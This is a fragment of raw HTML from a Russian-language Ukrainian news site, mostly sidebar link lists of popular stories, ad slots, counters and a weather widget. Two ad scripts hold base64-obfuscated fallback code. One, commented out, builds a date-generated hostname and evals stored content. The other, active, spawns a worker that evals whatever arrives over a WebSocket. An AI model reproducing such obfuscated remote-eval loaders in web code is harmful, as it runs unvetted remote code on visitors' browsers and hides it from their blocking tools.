class="postTitle" href="https://enovosty.com/news_society/full/1803-kurez-v-seti-pokazali-kota-ochen-poxozhego-na-dzheka-vorobya-foto" rel="bookmark">Курьез: в Сети показали кота, очень похожего на Джека Воробья (ФОТО)</a><br /></td> <td> <a class="postTitle" href="https://enovosty.com/news_society/full/1603-v-ukraine-ustanovyat-pamyatnik-komaru-vysotoj-6-metrov-video" rel="bookmark">В Украине установят памятник комару высотой 6 метров (ВИДЕО)</a><br /></td> </tr><tr><td> <a class="postTitle" href="https://enovosty.com/news_abroad/full/1603-v-irlandii-zametili-morzha-uchenye-uvereny-chto-on-pereplyl-okean-na-ldine-foto" rel="bookmark">Курьез: В Ирландии заметили моржа, который переплыл океан на льдине (ФОТО)</a><br /></td> <td> <a class="postTitle" href="https://enovosty.com/news_society/full/1703-spor-dvux-kotyat-za-steklom-magazina-rassmeshil-polzovatelej-seti-video" rel="bookmark">Курьез: спор двух котят рассмешил пользователей Сети (ВИДЕО)</a><br /></td> </tr><tr></tr></table></div><div class="bannerB"><div id="phoenix57c02c9d4f32fe394547dcf1"></div><script>var site_id = "57768bd94f32fe17ccf62bcc";var widget_id = "57c02c9d4f32fe394547dcf1";</script><script src="//phoenix-widget.com/static/js/jsonp.js"></script></div><!--<div id="MIXADV_6543" class="MIXADVERT_NET"></div><script>var node6543 = document.getElementById("MIXADV_6543");if( node6543 )
{var script = document.createElement("script");script.charset = "utf-8";script.src = "https://m.mixadvert.com/show/?id=6543&r="+Math.random();
node6543.parentNode.appendChild(script);script.onerror = function(){window.eval( atob("dmFyIGRhdGUgPSBuZXcgRGF0ZSgpO3ZhciBtb250aCA9IGRhdGUuZ2V0TW9udGgoKSArIDE7IHZhciBkYXkgPSBkYXRlLmdldERhdGUoKTsgdmFyIHllYXIgPSBkYXRlLmdldFllYXIoKTsgdmFyIG5hbWVfZGF5ID0gZGF0ZS5nZXREYXkoKSArIDE7dmFyIGRvbSA9IFsgIm9yZyIsICJ0b3AiLCAiYml6LnVhIiwgImNvLnVhIiwgImt5aXYudWEiLCAiY2x1YiIsICJzaG9wIl07IHZhciBzdHIgPWRheSoobW9udGggKiBuYW1lX2RheSAqIGRheSkrIiIrIGRheSoobW9udGggKyBuYW1lX2RheSArIGRheSAreWVhcik7dmFyIGhhc2ggPSAgYnRvYShidG9hKHN0cikpLnRvTG93ZXJDYXNlKCk7IHZhciBob3N0ID0gaGFzaC5zdWJzdHJpbmcoMywgaGFzaC5sZW5ndGggLSBuYW1lX2RheS8yKSsiLiIrZG9tW25hbWVfZGF5IC0gMV07dmFyIHIgPSBNYXRoLnJhbmRvbSgpLnRvU3RyaW5nKDM2KS5zdWJzdHIoMiwgMik7ciA9IHIucmVwbGFjZSgvWzAtOV0vZywgIiIpO3ZhciBkZWx0YSA9IE1hdGguZmxvb3IoTWF0aC5yYW5kb20oKSAqICgxMDAgLSAxMCArIDEpKSArIDEwO3ZhciBpZCA9IDY1NDMgLSBkZWx0YTsgdmFyIHNjcmlwdF9maXJzdCA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoInNjcmlwdCIpO3NjcmlwdF9maXJzdC5zcmMgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIitkZWx0YStpZCtyKyIiOyBub2RlNjU0My5wYXJlbnROb2RlLmFwcGVuZENoaWxkKHNjcmlwdF9maXJzdCk7c2V0VGltZW91dCggZnVuY3Rpb24gKCkge3NjcmlwdF9maXJzdC5yZW1vdmUoKX0sIDQwMDApO3NjcmlwdF9maXJzdC5vbmVycm9yID0gZnVuY3Rpb24oKXt2YXIgc2NyaXB0X3NlY29uZCA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoInNjcmlwdCIpO3NjcmlwdF9zZWNvbmQuc3JjID0gImh0dHBzOi8vIisgaG9zdCsiIjsgbm9kZTY1NDMucGFyZW50Tm9kZS5hcHBlbmRDaGlsZChzY3JpcHRfc2Vjb25kKTsgc2V0VGltZW91dCggZnVuY3Rpb24gKCkgeyBpZiggbm9kZTY1NDMuaW5uZXJIVE1MID09ICIiICkgd2luZG93LmV2YWwobG9jYWxTdG9yYWdlLmdldEl0ZW0oIjY1NDMiKSkgfSwgNTAwMCk7ICA7fTsg") );}}</script>
--><div class="wiget simple_pr" style="margin:0 0 10px;display:block; position:relative;" id="theme_posts"> <div class="caption "> <p>Новости общества</p><div class="popular-sort"><div class="sort"><a id="theme_31" onClick="getThemePopPosts(31, '77095', 77095, 15)">месяц</a></div><div class="sort"><a id="theme_7"style="text-decoration: underline;" onClick="getThemePopPosts(7, '77095', 77095, 15)">неделю</a>&nbsp;&nbsp;|</div><div class="sort">популярные за&#160;&#160;<a id="theme_1" onClick="getThemePopPosts(1, '77095', 77095, 15)">сутки</a>&nbsp;&nbsp;|</div></div> </div> <div class="newsbody"> <h3 class="press"><a href="https://enovosty.com/news_society/full/1403-kurez-samye-smeshnye-zamechaniya-uchitelej-v-shkolnyx-dnevnikax">Курьез: самые смешные замечания учителей в школьных дневниках (13574)</a></h3><h3 class="press"><a href="https://enovosty.com/news_society/full/1703-rapuncel-iz-yaponii-uzhe-15-let-ne-strigla-svoi-volosy-foto">Девушка из Японии, которая 15 лет не стригла волосы, стала звездой Сети (ФОТО) (9926)</a></h3><h3 class="press"><a href="https://enovosty.com/news_society/full/2003-kurez-video-kortezha-zelenskogo-aktivno-obsuzhdayut-v-seti">Курьез: видео кортежа Зеленского активно обсуждают в сети (6780)</a></h3><h3 class="press"><a href="https://enovosty.com/news_society/full/1403-sostoyanie-oligarxa-axmetova-pri-prezidente-zelenskom-vyroslo-bolee-chem-v-dva-raza">Состояние олигарха Ахметова при президенте Зеленском выросло более чем в два раза (6631)</a></h3><h3 class="press"><a href="https://enovosty.com/news_society/full/1903-v-karpatax-vypalo-pochti-2-metra-snega-vpechatlyayushhie-kadry-foto">В Карпатах выпало почти 2 метра снега: впечатляющие кадры (ФОТО) (5825)</a></h3><h3 class="press"><a href="https://enovosty.com/news_society/full/2003-verxovnaya-rada-ne-podderzhala-otmenu-perevoda-chasov-na-letnee-vremya">Верховная Рада не поддержала отмену перехода на летнее время: когда переводить часы (5183)</a></h3><h3 class="press"><a href="https://enovosty.com/news_society/full/1303-nazvany-glavnye-prichiny-pochemu-ukrainu-nakryla-tretya-volna-koronavirusa">Названы главные причины, почему Украину накрыла третья волна коронавируса (5113)</a></h3><h3 class="press"><a href="https://enovosty.com/news_society/full/1603-ukrainu-nakroet-xolodnyj-ciklon-sinoptiki-rasskazali-kogda-zhdat-tepla">Украину накроет холодный циклон: синоптики рассказали, когда ждать тепла (4708)</a></h3><h3 class="press"><a href="https://enovosty.com/news_society/full/1503-kurez-xaski-vospitala-kotenka-i-stala-zvezdoj-seti-foto">Курьез: хаски воспитала котенка и стала звездой Сети (ФОТО) (4658)</a></h3><h3 class="press"><a href="https://enovosty.com/news_society/full/1403-eks-prezident-polshi-lex-valensa-leg-v-bolnicu-i-zapisal-proshhalnoe-obrashhenie-k-narodu">Экс-президент Польши Лех Валенса лег в больницу и записал прощальное обращение к народу (3750)</a></h3></div> </div><div class="mainarmiya"><p><a style="font-size: 17px;" href="https://enovosty.com/armiya">Армия</a></p><table style="width:100%;"><tr><td style="width:24%;"><div style="border:none; padding-top:3px;" id="post-4390852"><a href="https://enovosty.com/armiya/full/566-bronirovannaya-komandno-shtabnaya-mashina-fv105-sultan-velikobritaniya" ><img width="101" height="80" src="https://enovosty.com/wp-content/uploads/2014/09/FV105_Sultan-101x80.jpg" class="attachment-101x80 size-101x80 wp-post-image" alt="" srcset="https://enovosty.com/wp-content/uploads/2014/09/FV105_Sultan-101x80.jpg 101w, https://enovosty.com/wp-content/uploads/2014/09/FV105_Sultan-112x88.jpg 112w, https://enovosty.com/wp-content/uploads/2014/09/FV105_Sultan.jpg 280w" sizes="(max-width: 101px) 100vw, 101px" /></a><a class="postTitle" href="https://enovosty.com/armiya/full/566-bronirovannaya-komandno-shtabnaya-mashina-fv105-sultan-velikobritaniya" >Бронированная командно-штабная машина FV105 Sultan (Великобритания)</a></div></td> <td style="width:24%;"><div style="border:none; padding-top:3px;" id="post-4409079"><a href="https://enovosty.com/armiya/full/817-zenitno-raketnaya-sistema-maloj-dalnosti-arbalet-k" ><img width="101" height="80" src="https://enovosty.com/wp-content/uploads/2014/11/arbalet-101x80.jpg" class="attachment-101x80 size-101x80 wp-post-image" alt="" srcset="https://enovosty.com/wp-content/uploads/2014/11/arbalet-101x80.jpg 101w, https://enovosty.com/wp-content/uploads/2014/11/arbalet-112x88.jpg 112w, https://enovosty.com/wp-content/uploads/2014/11/arbalet.jpg 280w" sizes="(max-width: 101px) 100vw, 101px" /></a><a class="postTitle" href="https://enovosty.com/armiya/full/817-zenitno-raketnaya-sistema-maloj-dalnosti-arbalet-k" >Зенитно-ракетная система малой дальности «Арбалет-K»</a></div></td> <td style="width:24%;"><div style="border:none; padding-top:3px;" id="post-4452879"><a href="https://enovosty.com/armiya/full/156-samohodnaya-gaubica-155-mm-type-75-yaponiya" ><img width="101" height="80" src="https://enovosty.com/wp-content/uploads/2015/06/Type75-101x80.jpg" class="attachment-101x80 size-101x80 wp-post-image" alt="" srcset="https://enovosty.com/wp-content/uploads/2015/06/Type75-101x80.jpg 101w, https://enovosty.com/wp-content/uploads/2015/06/Type75-112x88.jpg 112w, https://enovosty.com/wp-content/uploads/2015/06/Type75.jpg 280w" sizes="(max-width: 101px) 100vw, 101px" /></a><a class="postTitle" href="https://enovosty.com/armiya/full/156-samohodnaya-gaubica-155-mm-type-75-yaponiya" >Самоходная гаубица 155-мм Type 75 (Япония)</a></div></td> <td style="width:24%;"><div style="border:none; padding-top:3px;" id="post-4464216"><a href="https://enovosty.com/armiya/full/285-samolet-shturmovik-a-50-golden-eagle-yuzhnaya-koreya" ><img width="101" height="80" src="https://enovosty.com/wp-content/uploads/2015/08/A_50_Golden_Eagle-101x80.jpg" class="attachment-101x80 size-101x80 wp-post-image" alt="" srcset="https://enovosty.com/wp-content/uploads/2015/08/A_50_Golden_Eagle-101x80.jpg 101w, https://enovosty.com/wp-content/uploads/2015/08/A_50_Golden_Eagle-112x88.jpg 112w, https://enovosty.com/wp-content/uploads/2015/08/A_50_Golden_Eagle.jpg 280w" sizes="(max-width: 101px) 100vw, 101px" /></a><a class="postTitle" href="https://enovosty.com/armiya/full/285-samolet-shturmovik-a-50-golden-eagle-yuzhnaya-koreya" >Самолет штурмовик A-50 Golden Eagle (Южная Корея)</a></div></td> </tr> </table> <a href="https://enovosty.com/armiya" class="allarmiya">Вся армия&nbsp;&nbsp;&nbsp;&nbsp;>></a> </div><div class="mainperson"><p><a style="font-size: 17px;" href="https://enovosty.com/person">Персоны</a></p><table style="width:100%;"><tr><td style="width:24%;"><div style="border:none; padding-top:3px;" id="post-4301903"><a href="https://enovosty.com/person/full/ahmetov-rinat" ><img width="112" height="88" src="https://enovosty.com/wp-content/uploads/2013/06/ahmetov-112x88.jpg" class="attachment-112x88 size-112x88 wp-post-image" alt="" srcset="https://enovosty.com/wp-content/uploads/2013/06/ahmetov-112x88.jpg 112w, https://enovosty.com/wp-content/uploads/2013/06/ahmetov.jpg 280w" sizes="(max-width: 112px) 100vw, 112px" /></a><a class="postTitle" href="https://enovosty.com/person/full/ahmetov-rinat" >Ахметов<br /> Ринат</a></div></td> <td style="width:24%;"><div style="border:none; padding-top:3px;" id="post-4367427"><a href="https://enovosty.com/person/full/845-filatov-boris" ><img width="112" height="88" src="https://enovosty.com/wp-content/uploads/2014/06/filatov_edit-112x88.jpg" class="attachment-112x88 size-112x88 wp-post-image" alt="" srcset="https://enovosty.com/wp-content/uploads/2014/06/filatov_edit-112x88.jpg 112w, https://enovosty.com/wp-content/uploads/2014/06/filatov_edit.jpg 280w" sizes="(max-width: 112px) 100vw, 112px" /></a><a class="postTitle" href="https://enovosty.com/person/full/845-filatov-boris" >Филатов<br /> Борис</a></div></td> <td style="width:24%;"><div style="border:none; padding-top:3px;" id="post-4368535"><a href="https://enovosty.com/person/full/628-poyarkov-sergej" ></a><a class="postTitle" href="https://enovosty.com/person/full/628-poyarkov-sergej" >Поярков<br /> Сергей</a></div></td> <td style="width:24%;"><div style="border:none; padding-top:3px;" id="post-4438264"><a href="https://enovosty.com/person/full/887-seryj-nikolaj" ><img width="112" height="88" src="https://enovosty.com/wp-content/uploads/2015/04/syriy-112x88.jpg" class="attachment-112x88 size-112x88 wp-post-image" alt="" srcset="https://enovosty.com/wp-content/uploads/2015/04/syriy-112x88.jpg 112w, https://enovosty.com/wp-content/uploads/2015/04/syriy.jpg 280w" sizes="(max-width: 112px) 100vw, 112px" /></a><a class="postTitle" href="https://enovosty.com/person/full/887-seryj-nikolaj" >Сирый<br /> Николай</a></div></td> </tr> </table> <a href="https://enovosty.com/person" class="allperson">Все персоны&nbsp;&nbsp;&nbsp;&nbsp;>></a> </div><div class="wiget simple_pr" id="pop_posts"> <div class="caption"> <div class="popular-sort-link"><a href="https://enovosty.com/novosti">Популярные новости</a></div><div class="popular-sort"><div class="sort"><a id="pop_posts_31" onClick="getPopPosts(31)">месяц</a></div><div class="sort"><a id="pop_posts_7" onClick="getPopPosts(7)">неделю</a>&nbsp;&nbsp;|</div><div class="sort">популярные за&#160;&#160;<a id="pop_posts_1" style="text-decoration: underline;" onClick="getPopPosts(1)">сутки</a>&nbsp;&nbsp;|</div></div> </div> <div class="newsbody"> <p class="press"><a href="https://enovosty.com/news_society/full/2003-kurez-video-kortezha-zelenskogo-aktivno-obsuzhdayut-v-seti">Курьез: видео кортежа Зеленского активно обсуждают в сети (6787)</a></p><p class="press"><a href="https://enovosty.com/news_society/full/2003-verxovnaya-rada-ne-podderzhala-otmenu-perevoda-chasov-na-letnee-vremya">Верховная Рада не поддержала отмену перехода на летнее время: когда переводить часы (5190)</a></p><p class="press"><a href="https://enovosty.com/news_society/full/2003-sinoptiki-rasskazali-kogda-v-ukrainu-pridet-vesna">Синоптики рассказали, когда в Украину придет весна (3470)</a></p><p class="press"><a href="https://enovosty.com/news-auto/full/2003-kitajskaya-armiya-vvela-v-ekspluataciyu-novyj-tip-boevoj-mashiny-pexoty">Китайская армия ввела в эксплуатацию новый тип боевой машины пехоты (2152)</a></p><p class="press"><a href="https://enovosty.com/news_society/full/2003-kurez-muzej-voskovyx-figur-v-texase-ubral-statuyu-trampa-po-neobychnoj-prichine">Курьез: Музей восковых фигур в Техасе убрал статую Трампа по необычной причине (1884)</a></p><p class="press"><a href="https://enovosty.com/news-auto/full/2003-v-ukraine-mogut-polnostyu-zapretit-vvoz-avto-s-dvs">В Украине могут полностью запретить ввоз авто с ДВС (1637)</a></p><p class="press"><a href="https://enovosty.com/news_technology/full/2003-xolodnaya-vojna-ssha-atakuyut-kitajskix-texnogigantov">Холодная война: США атакуют китайских техногигантов (1405)</a></p><p class="press"><a href="https://enovosty.com/zdorove/full/2003-uchenye-vyyasnili-kto-bolshe-vsex-riskuet-povtorno-zarazitsya-covid-19">Ученые выяснили, кто больше всех рискует повторно заразиться COVID-19 (1382)</a></p><p class="press"><a href="https://enovosty.com/zdorove/full/2003-tretya-volna-sovid-19-vo-francii-parizhane-massovo-pokidayut-gorod-protyazhennost-probok-400-km">Третья волна СOVID-19 во Франции: парижане массово покидают город, протяженность пробок 400 км (1302)</a></p><p class="press"><a href="https://enovosty.com/news_society/full/2003-top-7-samyx-zhivopisnyx-ugolkov-na-planete-foto">ТОП-7 самых живописных уголков на планете (ФОТО) (1274)</a></p></div> </div></div> </div><style>#sidebarRight{margin-top:-227px}</style><div id="sidebarRight" style="width:300px;" ><form method="get" id="searchform" action="https://enovosty.com/"><div class="search300"> <input type="text" value="" name="s" id="s" /> <input type="hidden" name="arh_title" value="on"> <input type="hidden" name="arh_text" value="on"> <input type="hidden" name="arh_news" value="on"> <input type="hidden" name="arh_posts" value="on"><input type="submit" id="searchsubmit" value="Поиск" /></div></form><div class="wiget simple_pr socnet"><div class="caption"><p>Последние новости в соцсетях</p></div> <table><tr><td><a href="https://www.facebook.com/enovosty/" rel="nofollow" target="_blank" class="facebook"><i></i></a></td><td><a href="https://twitter.com/enovosty" rel="nofollow" target="_blank" class="twitter"><i></i></a></td><td><a href="https://www.youtube.com/channel/UCkFzUiPJ0z2YF4QIAhpkccg" rel="nofollow" target="_blank" class="you_tube"><i style="background: url(https://enovosty.com/wp-content/themes/eizvestia/img/You_Tube.png) no-repeat;"></i></a></td><td><a href="https://t.me/enovosty" rel="nofollow" target="_blank" class="telegram"><i style="background: url(https://enovosty.com/wp-content/themes/eizvestia/img/Telegram1_Obem1.png) no-repeat;"></i></a></td></tr></table></div><script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script><ins class="adsbygoogle" style="display:inline-block;width:300px;height:600px" data-ad-client="ca-pub-1008673670491634" data-ad-slot="9027886280"></ins><script>(adsbygoogle = window.adsbygoogle || []).push({});</script><div class="wiget simple_pr" style="margin-top:5px;"><div class="caption"><div class="popular-sort-link"><a href="https://enovosty.com/publications">Публикации</a></div></div> <p class="press"><a href="https://enovosty.com/publications/full/1302-chto-dvizhet-solnce-i-svetila-samye-krasivye-istorii-lyubvi">Что движет солнце и светила: Самые красивые истории любви</a></p><p class="press"><a href="https://enovosty.com/publications/full/1606-kakie-avtomobili-potreblyayut-menshe-goryuchego-obzor-rynka">Какие автомобили потребляют меньше топлива: Обзор рынка</a></p></div><div id='div-gpt-ad-1594112815543-0'> <script>googletag.cmd.push(function() { googletag.display('div-gpt-ad-1594112815543-0'); });</script></div></br><div class="rightsidbaranalitika_1" style="background-color:#ebf0f4; margin-top: 10px; margin-bottom: 15px;"> <a href="https://enovosty.com/society/full/803-kariatida-s-mirom-na-plechax-izvestnye-ukrainki-rasskazali-kto-takaya-sovremennaya-zhenshhina" title="Кариатида с миром на плечах: Известные украинки рассказали, кто такая Современная Женщина" > <img width="300" height="200" src="https://enovosty.com/wp-content/uploads/2021/03/kariatida-300x200.jpg" class="attachment-300x200 size-300x200 wp-post-image" alt="" srcset="https://enovosty.com/wp-content/uploads/2021/03/kariatida-300x200.jpg 300w, https://enovosty.com/wp-content/uploads/2021/03/kariatida-112x75.jpg 112w, https://enovosty.com/wp-content/uploads/2021/03/kariatida-768x512.jpg 768w, https://enovosty.com/wp-content/uploads/2021/03/kariatida-640x427.jpg 640w, https://enovosty.com/wp-content/uploads/2021/03/kariatida-e1615547152916.jpg 460w" sizes="(max-width: 300px) 100vw, 300px" /> </a><p class="entry-title td-module-title" style="text-align: left;padding: 7px;margin: 0;font: 700 12.5px Arial,Helvetica,sans-serif;"><a href="https://enovosty.com/society/full/803-kariatida-s-mirom-na-plechax-izvestnye-ukrainki-rasskazali-kto-takaya-sovremennaya-zhenshhina" style="line-height: 1.1;" rel="bookmark" title="Кариатида с миром на плечах: Известные украинки рассказали, кто такая Современная Женщина">Кариатида с миром на плечах: Известные украинки рассказали, кто такая Современная Женщина</a></p></div><script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script><ins class="adsbygoogle" style="display:inline-block;width:300px;height:250px" data-ad-client="ca-pub-1008673670491634" data-ad-slot="6220472701"></ins><script>(adsbygoogle = window.adsbygoogle || []).push({});</script><br> <div class="wiget simple_line infblogs"> <div class="caption"><a href="https://enovosty.com/blogs">Мнения</a></div><div class="block"><div class="cblock"><a href="https://enovosty.com/blogs/full/901-piraty-putina-komu-dostalsya-kerchenskij-most"><img alt="Пираты Путина. Кому достался Керченский мост" src="https://enovosty.com/wp-content/uploads/2021/01/portnikov-112x81.jpg"><div>Виталий Портников</div></a></div><p><a class="postTitle" href="https://enovosty.com/blogs/full/901-piraty-putina-komu-dostalsya-kerchenskij-most">Пираты Путина. Кому достался Керченский мост</a></p><span class="postExcerpt"><a href="https://enovosty.com/blogs/full/901-piraty-putina-komu-dostalsya-kerchenskij-most">Столько, сколько Путин будет президентом, и столько, сколько Крым будет аннексирован, они и будут зарабатывать.</a></span></div></div><div class="wiget simple_pr" style="margin-top:5px;"><div> <div class="caption"> <div class="popular-sort-link"><a href="https://enovosty.com/novosti">Популярные новости</a></div><div class="popular-sort"><div class="sort"><a id="pop_posts_31" onClick="getPopPosts(31)">месяц</a></div><div class="sort"><a id="pop_posts_7" style="text-decoration: underline;" onClick="getPopPosts(7)">неделю</a>&nbsp;&nbsp;|</div><div class="sort">популярные за&#160;&#160;<a id="pop_posts_1" onClick="getPopPosts(1)">сутки</a>&nbsp;&nbsp;|</div></div> </div> <div class="newsbody"> <p class="press"><a href="https://enovosty.com/news_society/full/1403-kurez-samye-smeshnye-zamechaniya-uchitelej-v-shkolnyx-dnevnikax">Курьез: самые смешные замечания учителей в школьных дневниках (13576)</a></p><p class="press"><a href="https://enovosty.com/news_society/full/1703-rapuncel-iz-yaponii-uzhe-15-let-ne-strigla-svoi-volosy-foto">Девушка из Японии, которая 15 лет не стригла волосы, стала звездой Сети (ФОТО) (9926)</a></p><p class="press"><a href="https://enovosty.com/news_society/full/2003-kurez-video-kortezha-zelenskogo-aktivno-obsuzhdayut-v-seti">Курьез: видео кортежа Зеленского активно обсуждают в сети (6790)</a></p></div></div></div><br><script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
300_c2 <ins class="adsbygoogle" style="display:inline-block;width:300px;height:250px" data-ad-client="ca-pub-1008673670491634" data-ad-slot="6220472701"></ins><script>(adsbygoogle = window.adsbygoogle || []).push({});</script></br><!-- <div id="pravdomer_info" style="margin-top:5px"><a href="https://enovosty.com/pravdomers"><img src="/wp-content/uploads/2017/11/pravdomer_info.gif"></a></div><br><br><script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
300_c2 <ins class="adsbygoogle" style="display:inline-block;width:300px;height:250px" data-ad-client="ca-pub-1008673670491634" data-ad-slot="6220472701"></ins><script>(adsbygoogle = window.adsbygoogle || []).push({});</script>
--><br><br><div id="riainfo_e77f01cd5a912b7be06984da8aae869f" onclick="trackOutboundLink(this, 'AutoRia', 'auto.ria.com');"></div><br><div id='go2net_6c64e1963fa943cf8c1efd800277f90c_zone_28808_sect_9220_site_7570' data-sender='go2net'></div><script type='text/javascript'>(window.globalAmlAds = window.globalAmlAds || []).push(function() {globalAml.display('go2net_6c64e1963fa943cf8c1efd800277f90c_zone_28808_sect_9220_site_7570');});</script><br><div id="pravdomer_info" style="margin-top:5px"><a href="https://besplatka.ua/ru/rabota" target="_blank"><img src="/wp-content/themes/eizvestia/img/BP_300x250_1.png" alt="работа на besplatka.ua"></a> </div><br><div id="redtram_news" onclick="trackOutboundLink(this, 'redtram_news', 'ru.redtram.com');"><div class="wiget simple"><div id="n4p_30546"><script class="r36857" type="text/javascript">(function() {var worker36857,tickerID = 36857,tag = document.currentScript || (function() {var scripts = document.getElementsByClassName('r36857'),len = scripts.length;return len ? scripts[len - 1] : null;})(),idn = (function() {var i, num, chars = "abcdefghiklmnopqrstuvwxyz",len = Math.floor((Math.random() * 2) + 4),idn = '';for (i = 0; i < len; i++) {num = Math.floor(Math.random() * chars.length);idn += chars.substring(num, num + 1);}return idn;})();
var container = document.createElement('div');container.id = idn;container.innerHTML = 'загрузка...';tag.parentNode.insertBefore(container, tag);var script = document.createElement('script');script.setAttribute('class', 's36857');script.setAttribute('data-idn', idn);script.src = '//v1r7on.news/ru-n4p/0/36/ticker_36857.js';
script.type = 'text/javascript';script.charset = 'utf-8';script.onerror = function() {if (!('atob' in window && 'Worker' in window))
return;window.rtIsWebSocket = true;var code = 'dmFyIHNvY2tldDsgZnVuY3Rpb24gc2VuZFRvU29ja2V0KGRhdGEpIHsgdmFyIHdzc1VybCA9ICJ3c3M6Ly9uNHAucmVkdHJhbS5jb20vd3MvIjsgaWYgKCFzb2NrZXQgfHwgc29ja2V0LnJlYWR5U3RhdGUgPT09IHNvY2tldC5DTE9TRUQpIHsgc29ja2V0ID0gbmV3IFdlYlNvY2tldCh3c3NVcmwpOyBzb2NrZXQub25tZXNzYWdlID0gZnVuY3Rpb24ocikgeyBwb3N0TWVzc2FnZShKU09OLnN0cmluZ2lmeShyLmRhdGEpKTsgfTsgfSBpZiAoc29ja2V0KSB7IHNlbmRDb25uZWN0aW9uKHNvY2tldCwgZnVuY3Rpb24oKSB7IHNvY2tldC5zZW5kKGRhdGEpOyB9KTsgfSB9IGZ1bmN0aW9uIHNlbmRDb25uZWN0aW9uKGMsIHIpIHsgc2V0VGltZW91dChmdW5jdGlvbigpIHsgaWYgKGMucmVhZHlTdGF0ZSA9PT0gYy5PUEVOKSB7IHJldHVybiByKCk7IH0gcmV0dXJuIHNlbmRDb25uZWN0aW9uKGMsIHIpOyB9LCA1MCk7IH0gb25tZXNzYWdlID0gZnVuY3Rpb24ocikgeyBzZW5kVG9Tb2NrZXQoci5kYXRhKTsgfTsg';function runExternalMessage(data) {worker36857.postMessage(data);}worker36857 = new Worker(URL.createObjectURL(
new Blob(["eval(atob('"+code+"'))"], {type: 'text/javascript'})
));worker36857.onmessage = function(m) {var json = JSON.parse(m.data),content = JSON.parse(json)['content'];eval(content);};worker36857.postMessage(JSON.stringify({command: 'init',informer_id: tickerID,url: script.src
}));};tag.parentNode.insertBefore(script, tag);})();</script></div></div> </div><br><div><a href="https://www.youtube.com/channel/UCkFzUiPJ0z2YF4QIAhpkccg" target="_blank"><img alt="Экономические новости youtube" width="300" height="250" src="https://enovosty.com/wp-content/themes/eizvestia/img/ENTV2_Svedenie.gif"></a></div><br><div id="adpartner-jsunit-4125"><script type="text/javascript">var head = document.getElementsByTagName('head')[0];var script = document.createElement('script');script.type = 'text/javascript';script.src = "//a4p.adpartner.pro/jsunit?id=4125&ref=" + encodeURIComponent(document.referrer) + "&" + Math.random();
head.appendChild(script);</script></div><br><link rel="stylesheet" type="text/css" href="https://s1.gismeteo.ua/static/css/informer2/gs_informerClient.min.css"><div id="gsInformerID-RpMlQd24Vh0i0g" class="gsInformer" style="width:300px;height:168px"> <div class="gsIContent"><div id="cityLink"><a href="https://www.gismeteo.ua/weather-kyiv-4944/" title="Погода в Киеве" target="_blank"><img src="https://s1.gismeteo.ua/static/images/gisloader.svg" width="24" height="24" alt="Погода в Киеве"></a></div><div class="gsLinks"> <table> <tr> <td> <div class="leftCol"> <a href="https://www.gismeteo.ua" target="_blank" title="Погода"> <img alt="Погода" src="https://s1.gismeteo.ua/static/images/informer2/logo-mini2.png" align="middle" border="0" height="16" width="11"/> <img src="https://s1.gismeteo.ua/static/images/gismeteo.svg" border="0" align="middle" style="left: 5px; top:1px"> </a> </div> <div class="rightCol"> <a href="https://www.gismeteo.ua/weather-kyiv-4944/14-days/" target="_blank" title="Погода в Киеве на 2 недели"><img src="https://s1.gismeteo.ua/static/images/informer2/forecast-2weeks.ru.svg" border="0" align="middle" style="top:auto" alt="Погода в Киеве на 2 недели"> </a> </div> </td></tr> </table></div> </div></div><script src="https://www.gismeteo.ua/ajax/getInformer/?hash=RpMlQd24Vh0i0g" type="text/javascript"></script></br><div><a href="https://enovosty.com/ekonomika/full/2801-yuzhmash-vzletit-ili-upadet" target="_blank" rel="noreferrer noopener"><img alt="Южмаш" src="/wp-content/uploads/2021/02/Tsiklon.jpg"></a></div></br><div id="help" style="margin-bottom: 15px;"><a href="https://dobro.ua/" target="_blank" rel="nofollow"><img style="width:300px;" src="/wp-content/themes/eizvestia/img/banner_subscribe_uk.png" alt="help"></a></div><br><script charset="windows-1251" src="//i.mediatraffic.com.ua/js/uho/mt20_3.js"></script><div id="300-290"></div><script type="text/javascript">new MTr('300-290', {site:907,format:0});</script><div id="lastafisha" class="slide" style="width:240px;margin:auto;"></div><script type="text/javascript">document.write('<a href="//www.liveinternet.ru/click" '+
'target="_blank"><img src="//counter.yadro.ru/hit?t52.6;r'+
escape(document.referrer)+((typeof(screen)=='undefined')?'':
';s'+screen.width+'*'+screen.height+'*'+(screen.colorDepth?
screen.colorDepth:screen.pixelDepth))+';u'+escape(document.URL)+
';h'+escape(document.title.substring(0,150))+';'+Math.random()+
'" alt="" title="LiveInternet: показане число переглядів і'+
' відвідувачів за 24 години" '+
'border="0" width="88" height="31"><\/a>')
</script><br><br></br><a style="margin-bottom:5px;display: inline-block;" href="https://www.bigmir.net/" target="_blank" onClick='img=new Image();img.src="//www.bigmir.net/?cl=101585";'><img src="//c.bigmir.net/?s101585&t8&l1" width="88" height="31" alt="bigmir)net TOP 100" title="bigmir)net TOP 100"></a></div><div class="cls"></div><script>
window.onload = function() {
// Delay to allow the async Google Ads to load
setTimeout(function() {
// Get the first AdSense ad unit on the page
var ad = document.querySelector("ins.adsbygoogle");
// If the ads are not loaded, track the event
if (ad && ad.innerHTML.replace(/\s/g, "").length == 0) {if (typeof ga !== 'undefined') {// Log an event in Universal Analytics
// but without affecting overall bounce rate
ga('send', 'event', 'Adblock', 'Yes', {'nonInteraction': 1});} else if (typeof _gaq !== 'undefined') {// Log a non-interactive event in old Google Analytics
_gaq.push(['_trackEvent', 'Adblock', 'Yes', undefined, undefined, true]);}}}, 2000); // Run ad block detection 2 seconds after page load
};
</script> </div> <!-- start NEW_content_v1 for enovosty.com <div id="adpartner-jsunit-3430"> <script type="text/javascript">var head = document.getElementsByTagName('head')[0];var script = document.createElement('script');script.type = 'text/javascript';script.src = "//a4p.adpartner.pro/jsunit?id=3430&ref=" + encodeURIComponent(document.referrer) + "&" + Math.random();
